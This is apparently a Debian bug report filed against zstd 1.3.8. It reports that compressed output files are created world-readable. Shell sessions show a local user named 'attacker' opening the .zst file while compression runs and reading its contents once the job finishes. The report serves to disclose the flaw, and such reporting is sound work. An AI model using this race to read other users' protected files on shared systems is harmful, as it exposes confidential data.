Package: zstd Version: 1.3.8+dfsg-3 Severity: critical
Compressing a large file with restricted access permissions a new, world readable file is created, revealing the contents of the uncompressed file. Sample: # whoami root # zstd -q -13 -T8 sample.dmp &> zstd.log & : : # ls -al total 385983012 drwxr-xr-x 2 root root 4096 Jan 30 16:01 . drwxr-xr-x 35 root root 4096 Jan 30 15:39 .. -rw------- 1 oracle users 279265214464 Jan 29 22:02 sample.dmp -rw-r--r-- 1 root root 115981336576 Jan 30 16:25 sample.dmp.zst -rw-r--r-- 1 root root 0 Jan 30 16:01 zstd.log : : [1]+ Done zstd -q -13 -T8 sample.dmp &> zstd.log # md5sum sample.dmp.zst 5a3d3401e8e46483659e820f96ad0ef0 sample.dmp.zst An attacker might be able to open(2) the file while zstd is still running, wait for zstd to complete its job, and then read(2) the whole file: % whoami attacker % ls -al total 465071584 drwxr-xr-x 2 root root 4096 Jan 30 16:01 . drwxr-xr-x 35 root root 4096 Jan 30 15:39 .. -rw------- 1 oracle users 279265214464 Jan 29 22:02 sample.dmp -rw-r--r-- 1 root root 196968022016 Jan 30 16:41 sample.dmp.zst -rw-r--r-- 1 root root 0 Jan 30 16:01 zstd.log % md5sum sample.dmp.zst ^Z [1]+ Stopped md5sum sample.dmp.zst : : % ls -al total 475580484 drwxr-xr-x 2 root root 4096 Jan 30 16:01 . drwxr-xr-x 35 root root 4096 Jan 30 15:39 .. -rw------- 1 oracle users 279265214464 Jan 29 22:02 sample.dmp -rw------- 1 oracle users 207729131801 Jan 29 22:02 sample.dmp.zst -rw-r--r-- 1 root root 0 Jan 30 16:01 zstd.log % fg md5sum sample.dmp.zst 5a3d3401e8e46483659e820f96ad0ef0 sample.dmp.zst % In this sample session the attacker got the correct md5sum, just for demonstation purposes. Hi could have created his own private copy in the same way. This makes zstd unusable for me. Regards Harri